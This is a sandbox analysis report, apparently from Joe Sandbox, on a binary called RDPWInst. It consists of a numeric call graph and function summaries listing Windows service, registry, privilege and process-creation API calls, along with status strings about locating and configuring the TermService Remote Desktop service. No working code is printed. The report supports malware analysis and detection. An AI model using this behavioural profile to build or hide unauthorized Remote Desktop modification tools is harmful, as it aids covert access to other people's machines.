23354->23360 23356 40f895 23355->23356 23357 4072a4 15 API calls 23356->23357 23357->23354 23359 40f8b2 23358->23359 23361 40f7e8 71 API calls 23359->23361 23360->22531 23362 40f8ba 23361->23362 23362->23360 23440 40fb5c 23362->23440 23365 406bf0 23364->23365 23366 40716f 23364->23366 23365->23364 23367 4070b0 23365->23367 23369 406c00 23365->23369 23371 406c10 23365->23371 23367->23366 23370 406bf0 15 API calls 23367->23370 23374 4070c3 23367->23374 23368 406c40 23368->22540 23369->23371 23373 407504 14 API calls 23369->23373 23370->23374 23371->23368 23457 4041cc 14 API calls 23371->23457 23372 40710c 23372->23366 23378 407504 14 API calls 23372->23378 23373->23371 23377 4070ee 23374->23377 23458 406504 15 API calls 23374->23458 23377->23372 23459 406504 15 API calls 23377->23459 23380 407122 23378->23380 23382 40715a 23380->23382 23460 406368 14 API calls 23380->23460 23383 406bf0 15 API calls 23382->23383 23384 40716b 23383->23384 23384->22540 23386 406c7c 23385->23386 23387 40f787 GetFileAttributesW 23386->23387 23388 40f792 23387->23388 23389 40f79a GetLastError 23387->23389 23388->22552 23390 40f7a6 23389->23390 23391 40f7bb 23389->23391 23390->23391 23392 40f7b0 23390->23392 23391->22552 23461 40f73c FindFirstFileW FindClose 23392->23461 23394 40f7b7 23394->23391 23396 43cc63 23395->23396 23462 42f9fc 23396->23462 23398 43cc91 23466 42f7b0 23398->23466 23400 43ccad 23401 407450 15 API calls 23400->23401 23402 43cd49 23401->23402 23403 407450 15 API calls 23402->23403 23404 43cd51 23403->23404 23405 407450 15 API calls 23404->23405 23406 43cd5b 23405->23406 23407 407450 15 API calls 23406->23407 23408 43cd63 23407->23408 23409 404cdc 14 API calls 23408->23409 23410 43cd68 23409->23410 23411 4042f8 14 API calls 23410->23411 23412 43cd6d 23411->23412 23412->22513 23413->22623 23414->22556 23416 40f912 23415->23416 23419 40f93d 23416->23419 23430 4064f4 15 API calls 23416->23430 23418 40f9b2 23418->23333 23419->23418 23420 4064f4 15 API calls 23419->23420 23420->23419 23422 407322 23421->23422 23424 40734d 23422->23424 23431 4064f4 15 API calls 23422->23431 23425 407395 23424->23425 23426 4073a8 23424->23426 23427 406d2c 14 API calls 23425->23427 23432 406d1c 15 API calls 23426->23432 23429 4073a6 23427->23429 23429->23335 23430->23419 23431->23424 23432->23429 23434 406bf0 15 API calls 23433->23434 23435 414f4c 23434->23435 23446 414e7c 23435->23446 23437 414f66 23438 40f840 23437->23438 23439 406f48 15 API calls 23437->23439 23438->23347 23439->23438 23441 406c7c 23440->23441 23442 40fb68 CreateDirectoryW 23441->23442 23442->23360 23443->23346 23445->23350 23447 414e8e 23446->23447 23450 414ebd 23447->23450 23454 4064f4 15 API calls 23447->23454 23448 414ef0 23453 414f0b 23448->23453 23456 414728 15 API calls 23448->23456 23450->23448 23455 4064f4 15 API calls 23450->23455 23453->23437 23454->23450 23455->23448 23456->23453 23457->23368 23458->23377 23459->23372 23460->23382 23461->23394 23463 42fa06 23462->23463 23471 42fb48 FindResourceW 23463->23471 23465 42fa36 23465->23398 23483 42f548 23466->23483 23468 42f7ca 23487 42f798 69 API calls 23468->23487 23470 42f7e5 23470->23400 23472 42fb74 LoadResource 23471->23472 23473 42fb6d 23471->23473 23474 42fb87 23472->23474 23475 42fb8e SizeofResource LockResource 23472->23475 23481 42faa8 69 API calls 23473->23481 23482 42faa8 69 API calls 23474->23482 23478 42fbac 23475->23478 23478->23465 23479 42fb73 23479->23472 23480 42fb8d 23480->23475 23481->23479 23482->23480 23484 42f551 23483->23484 23488 42f58c 23484->23488 23486 42f56d 23486->23468 23487->23470 23489 42f5a7 23488->23489 23490 42f5d3 23489->23490 23491 42f64f 23489->23491 23513 40f650 23490->23513 23521 40f5f8 CreateFileW 23491->23521 23494 42f659 23512 42f64d 23494->23512 23522 40fa54 17 API calls 23494->23522 23496 42f5f0 23496->23512 23517 40fa54 17 API calls 23496->23517 23497 406bf0 15 API calls 23500 42f6bc 23497->23500 23498 42f674 GetLastError 23523 412bfc 15 API calls 23498->23523 23500->23486 23502 42f60f GetLastError 23518 412bfc 15 API calls 23502->23518 23503 42f68b 23524 413794 69 API calls 23503->23524 23506 42f626 23519 413794 69 API calls 23506->23519 23507 42f6ad 23525 405c30 14 API calls 23507->23525 23510 42f648 23520 405c30 14 API calls 23510->23520 23512->23497 23514 40f667 23513->23514 23515 40f68f 23513->23515 23516 40f689 CreateFileW 23514->23516 23515->23496 23516->23515 23517->23502 23518->23506 23519->23510 23521->23494 23522->23498 23523->23503 23524->23507 23527 406c44 14 API calls 23526->23527 23528 438a04 23527->23528 23529 43858c 15 API calls 23528->23529 23530 438a0c 23529->23530 23531 438a24 23530->23531 23552 4073dc 15 API calls 23530->23552 23533 438a35 23531->23533 23535 438a65 23531->23535 23534 438a51 RegOpenKeyExW 23533->23534 23538 438a60 23534->23538 23536 438a8b RegCreateKeyExW 23535->23536 23536->23538 23537 438ad3 23537->22661 23538->23537 23539 438ac6 23538->23539 23553 407184 15 API calls 23538->23553 23554 4388bc 17 API calls 23539->23554 23543 439392 23542->23543 23544 4393bd 23543->23544 23563 4064f4 15 API calls 23543->23563 23555 43987c 23544->23555 23547 4393e3 23547->22670 23548->22657 23549->22657 23550->22663 23552->23531 23554->23537 23556 439895 23555->23556 23557 4398a9 RegSetValueExW 23556->23557 23558 4398bc 23557->23558 23559 4398e4 23558->23559 23564 413794 69 API calls 23558->23564 23559->23547 23561 4398df 23565 405c30 14 API calls 23561->23565 23563->23544 23564->23561 23567 43ae3c 23566->23567 23568 407450 15 API calls 23567->23568 23569 43ae60 23568->23569 23570 407450 15 API calls 23569->23570 23571 43ae68 23570->23571 23572 407450 15 API calls 23571->23572 23573 43ae72 23572->23573 23574 404cdc 14 API calls 23573->23574 23575 43ae77 23574->23575 23576 4042f8 14 API calls 23575->23576 23577 43ae7c OpenSCManagerW 23576->23577 23578 43ae90 GetLastError 23577->23578 23579 43aeca 23577->23579 23580 407450 15 API calls 23578->23580 23582 43aed4 OpenServiceW 23579->23582 23581 43aeac 23580->23581 23585 407dec 14 API calls 23581->23585 23583 43af21 QueryServiceConfigW 23582->23583 23584 43aee1 CloseServiceHandle GetLastError 23582->23584 23588 43af33 23583->23588 23589 43af51 23583->23589 23586 407450 15 API calls 23584->23586 23587 43aeb1 23585->23587 23590 43af03 23586->23590 23592 407450 15 API calls 23587->23592 23593 407450 15 API calls 23588->23593 23591 4041b0 14 API calls 23589->23591 23594 407dec 14 API calls 23590->23594 23595 43af5b QueryServiceConfigW 23591->23595 23596 43aebb 23592->23596 23597 43af42 23593->23597 23598 43af08 23594->23598 23599 43af71 23595->23599 23600 43afbe 23595->23600 23601 404cdc 14 API calls 23596->23601 23602 404cdc 14 API calls 23597->23602 23605 407450 15 API calls 23598->23605 23627 4041cc 14 API calls 23599->23627 23628 4041cc 14 API calls 23600->23628 23607 43aec0 23601->23607 23603 43af47 23602->23603 23608 4042f8 14 API calls 23603->23608 23610 43af12 23605->23610 23612 4042f8 14 API calls 23607->23612 23613 43af1c 23608->23613 23609 43afd1 CloseServiceHandle CloseServiceHandle 23614 43aec5 23609->23614 23615 404cdc 14 API calls 23610->23615 23611 43af7b CloseServiceHandle CloseServiceHandle GetLastError 23616 407450 15 API calls 23611->23616 23612->23614 23613->23614 23614->22687 23617 43af17 23615->23617 23618 43afa3 23616->23618 23619 4042f8 14 API calls 23617->23619 23620 407dec 14 API calls 23618->23620 23619->23613 23621 43afa8 23620->23621 23622 407450 15 API calls 23621->23622 23623 43afb2 23622->23623 23624 404cdc 14 API calls 23623->23624 23625 43afb7 23624->23625 23626 4042f8 14 API calls 23625->23626 23626->23613 23627->23611 23628->23609 23629->22700 23631->22708 23633->22713 23635->22732 23636->22735 23637->22779 23638->22784 23639->22784 23640->22784 23642 439674 70 API calls 23641->23642 23643 4396c0 23642->23643 23643->22803 23663 4399a0 23644->23663 23646 439d58 23647 439d64 23646->23647 23648 439d5e RegCloseKey 23646->23648 23647->22808 23647->22851 23648->23647 23649->22791 23650->22791 23651->22796 23652->22813 23653->22833 23664 406c44 14 API calls 23663->23664 23665 4399c9 23664->23665 23666 43858c 15 API calls 23665->23666 23667 4399d1 23666->23667 23669 4399e9 23667->23669 23672 4073dc 15 API calls 23667->23672 23670 439a0a RegOpenKeyExW 23669->23670 23671 439a25 23670->23671 23671->23646 23672->23669 23674 43c32e 23673->23674 23690 4074fc 23674->23690 23676 43c35c 23677 43c378 CreateProcessW 23676->23677 23678 43c3b7 CloseHandle WaitForSingleObject CloseHandle 23677->23678 23679 43c384 GetLastError 23677->23679 23682 43c3b5 23678->23682 23680 407450 15 API calls 23679->23680 23681 43c39c 23680->23681 23683 407dec 14 API calls 23681->23683 23682->22936 23684 43c3a1 23683->23684 23685 407450 15 API calls 23684->23685 23686 43c3ab 23685->23686 23687 404cdc 14 API calls 23686->23687 23688 43c3b0 23687->23688 23689 4042f8 14 API calls 23688->23689 23689->23682 23691 4074a8 23690->23691 23692 4074f5 23691->23692 23693 4074bb 23691->23693 23698 4064ec 15 API calls 23691->23698 23692->23676 23693->23692 23695 407504 14 API calls 23693->23695 23696 4074cf 23695->23696 23696->23692 23699 4041cc 14 API calls 23696->23699 23698->23693 23699->23692 23700 42da28 23701 42da56 23700->23701 23702 408334 20 API calls 23701->23702 23703 42da89 23702->23703 23710 416308 23703->23710 23705 42daa3 23731 416e30 23705->23731 23708 42dacc 23709 402990 VirtualAlloc 23709->23708 23711 416332 23710->23711 23721 416352 23710->23721 23738 416ea0 InterlockedCompareExchange 23711->23738 23713 40789c 16 API calls 23715 4163fd 23713->23715 23714 416337 23716 416356 23714->23716 23717 41634d 23714->23717 23715->23705 23740 416270 InterlockedCompareExchange 23716->23740 23739 416ea0 InterlockedCompareExchange 23717->23739 23720 41635b 23722 416371 23720->23722 23723 41637a 23720->23723 23721->23713 23741 416270 InterlockedCompareExchange 23722->23741 23742 416edc 71 API calls 23723->23742 23726 41637f 23727 416395 23726->23727 23728 41639e 23726->23728 23743 416edc 71 API calls 23727->23743 23744 416dbc 71 API calls 23728->23744 23745 416b68 23731->23745 23733 416e5f 23734 406d2c 14 API calls 23733->23734 23735 416e74 23734->23735 23736 408340 16 API calls 23735->23736 23737 416e8f 23736->23737 23737->23709 23738->23714 23739->23721 23740->23720 23741->23721 23742->23726 23743->23721 23744->23721 23746 416b9a 23745->23746 23747 416b7f 23745->23747 23748 416bc2 23746->23748 23787 413794 69 API calls 23746->23787 23747->23746 23785 4136c4 69 API calls 23747->23785 23754 416bea 23748->23754 23789 413794 69 API calls 23748->23789 23751 416b95 23786 405c30 14 API calls 23751->23786 23752 416bbd 23788 405c30 14 API calls 23752->23788 23758 416c1b 23754->23758 23791 413794 69 API calls 23754->23791 23757 416be5 23790 405c30 14 API calls 23757->23790 23767 416a78 23758->23767 23762 416c16 23792 405c30 14 API calls 23762->23792 23765 408334 20 API calls 23766 416c42 23765->23766 23766->23733 23768 416aaa 23767->23768 23769 416a8f 23767->23769 23770 416ad2 23768->23770 23795 413794 69 API calls 23768->23795 23769->23768 23793 4136c4 69 API calls 23769->23793 23776 416afa 23770->23776 23797 413794 69 API calls 23770->23797 23773 416aa5 23794 405c30 14 API calls 23773->23794 23774 416acd 23796 405c30 14 API calls 23774->23796 23781 416b2b 23776->23781 23799 413794 69 API calls 23776->23799 23779 416af5 23798 405c30 14 API calls 23779->23798 23781->23765 23783 416b26 23800 405c30 14 API calls 23783->23800 23785->23751 23787->23752 23789->23757 23791->23762 23793->23773 23795->23774 23797->23779 23799->23783 23801 40472c 23802 404742 23801->23802 23803 404748 23802->23803 23804 4047a5 CreateFileW 23802->23804 23805 404857 GetStdHandle 23802->23805 23806 4047c3 23804->23806 23807 4048cb GetLastError 23804->23807 23805->23807 23810 404892 23805->23810 23809 4047d1 GetFileSize 23806->23809 23806->23810 23807->23803 23809->23807 23811 4047e5 SetFilePointer 23809->23811 23810->23803 23812 40489c GetFileType 23810->23812 23811->23807 23815 404801 ReadFile 23811->23815 23812->23803 23814 4048b7 CloseHandle 23812->23814 23814->23803 23815->23807 23816 404823 23815->23816 23816->23810 23817 404836 SetFilePointer 23816->23817 23817->23807 23818 40484b SetEndOfFile 23817->23818 23818->23807 23819 404855 23818->23819 23819->23810

                                                    Executed Functions

                                                    Function 0043B7D4 Relevance: 33.6, APIs: 9, Strings: 10, Instructions: 336serviceCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 705 43b7d4-43b7d7 706 43b7dc-43b7e1 705->706 706->706 707 43b7e3-43b7f4 706->707 708 43b7f8-43b80a OpenSCManagerW 707->708 709 43b848-43b8a9 call 408334 call 40816c call 404a04 call 40816c EnumServicesStatusExW 708->709 710 43b80c-43b843 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 708->710 728 43b8af-43b8bc GetLastError 709->728 729 43b99e-43b9b5 CloseServiceHandle call 40816c 709->729 710->709 732 43b8fe-43b95a call 408334 call 40816c call 404a04 call 40816c EnumServicesStatusExW 728->732 733 43b8be-43b8f9 CloseServiceHandle call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 728->733 739 43ba22-43ba26 729->739 740 43b9b7-43b9b8 729->740 732->729 782 43b95c-43b999 CloseServiceHandle GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 732->782 733->729 743 43ba4b-43ba52 739->743 744 43ba28-43ba46 call 407450 call 404cdc call 4042f8 call 40632c 739->744 745 43b9ba-43b9c5 740->745 750 43ba54-43ba58 743->750 751 43ba9f-43baf7 call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 408334 call 40816c 743->751 744->743 745->739 749 43b9c7-43b9f6 call 406d9c call 40e50c * 2 call 4072a4 745->749 806 43b9f8-43ba1c call 406d9c 749->806 807 43ba1e-43ba20 749->807 758 43ba5a-43ba78 call 407450 call 404cdc call 4042f8 call 40632c 750->758 759 43ba7d-43ba91 call 43b1a8 call 43b58c 750->759 820 43bb80-43bb9b call 406bf0 call 40816c 751->820 821 43bafd-43bafe 751->821 758->759 785 43ba96-43ba9a 759->785 782->729 785->708 806->739 807->739 807->745 834 43bbe4-43bbeb 820->834 835 43bb9d-43bb9e 820->835 823 43bb00-43bb0a 821->823 823->820 826 43bb0c-43bb19 823->826 828 43bb1b-43bb37 call 406d9c call 4072a4 826->828 829 43bb7c-43bb7e 826->829 828->829 845 43bb39-43bb77 call 40816c call 408334 call 40816c call 406d9c 828->845 829->820 829->823 837 43bc13-43bc27 call 407450 call 404cdc call 4042f8 834->837 838 43bbed-43bc11 call 407450 * 2 call 404cdc call 4042f8 834->838 836 43bba0-43bba7 835->836 841 43bba9-43bbbc call 406bf0 836->841 842 43bbbe-43bbdb call 407184 836->842 862 43bc2c-43bc5c call 406be8 call 406be0 call 408340 837->862 838->862 853 43bbe0-43bbe2 841->853 842->853 845->829 853->834 853->836
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                    • GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                    • GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B953
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B95D
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B962
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseErrorHandleLastService$EnumServicesStatus$ManagerOpen
                                                    • String ID: $sD$ServicesActive$TermService$[*] No shared services found.$[*] Shared services found: $[+] TermService found (pid $[-] EnumServicesStatusEx error (code $[-] Failed to set up TermService. Unknown error.$[-] OpenSCManager error (code $[-] TermService not found.
                                                    • API String ID: 2770857348-2470772499
                                                    • Opcode ID: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                    • Instruction ID: fb74497bf6b161f68451673f63bd6f491a4d1cb4b87c09a1aee9fb4a9c308b37
                                                    • Opcode Fuzzy Hash: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                    • Instruction Fuzzy Hash: A1C15074A041049BD710FBB9DD42B5E76A5EB89308F11507FF640BB292CB3CAD058BAE
                                                    Function 0043B1A8 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 118serviceCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B1FE
                                                    • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B209
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000), ref: 0043B24F
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B25B
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B260
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastOpenService$CloseHandleManager
                                                    • String ID: $sD$...$ServicesActive$[*] Configuring $[-] ChangeServiceConfig error (code $[-] OpenSCManager error (code $[-] OpenService error (code
                                                    • API String ID: 48634454-398082305
                                                    • Opcode ID: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                    • Instruction ID: ec3001641675e227f0f71ffcc16d431bf32a474d6a16b1f18b89db5f0a2815a5
                                                    • Opcode Fuzzy Hash: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                    • Instruction Fuzzy Hash: 32318DA4708210AAE611B7B68D43B2F6598DF8D308F12917BB614A6693CB3C9D0195BF
                                                    Function 0043B58C Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 107serviceCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                    • GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                      • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                      • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B61F
                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B62E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Service$CloseErrorHandleLastOpen$Manager
                                                    • String ID: $sD$...$OpenSCManager$OpenService$ServicesActive$StartService$[*] Starting
                                                    • API String ID: 2257214823-3855835416
                                                    • Opcode ID: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                    • Instruction ID: 0e693e6e1cec2ac2fe46a8ff9d209bc722a6061919d6bcedfcc5fc96e321ed9b
                                                    • Opcode Fuzzy Hash: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                    • Instruction Fuzzy Hash: 6C313471A04208AEDB10FBB68842B5F77E8DB4C715F60947BF614E7283DB7C9940869E
                                                    Function 0043BF00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 130COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                    • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                    • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0043BFA6
                                                    • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BFAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastProcess$CurrentLookupOpenPrivilegeTokenValue
                                                    • String ID: $sD$[-] AdjustTokenPrivileges error (code $[-] LookupPrivilegeValue error (code $[-] OpenProcessToken error (code
                                                    • API String ID: 1401577899-1200187420
                                                    • Opcode ID: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                    • Instruction ID: 40249df541e28cb1c3cbeffac081f98f3db748ff3bf72c69c2aa91bf02ef4f1c
                                                    • Opcode Fuzzy Hash: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                    • Instruction Fuzzy Hash: E5412475E00218AFDB04EBE5DD81A9EB7B8EF49704F11407BF500F2291DA789D059B6A
                                                    Function 0043DC64 Relevance: 6.1, APIs: 4, Instructions: 64libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC7A
                                                    • FindResourceW.KERNEL32(00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC8A
                                                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DC97
                                                    • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DCF5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryLoadResource$FindFree
                                                    • String ID:
                                                    • API String ID: 3272429154-0
                                                    • Opcode ID: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                    • Instruction ID: b141022db8bc2a2b6abfb651a233e3798db1869765cd13709d0418182ea328c4
                                                    • Opcode Fuzzy Hash: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                    • Instruction Fuzzy Hash: 9411E3273067445AC721DA268A81EDF3B169FC1340F09C1A6F9009F396E679C901C39A
                                                    Function 004093C0 Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093DC
                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093E5
                                                      • Part of subcall function 004092D8: FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
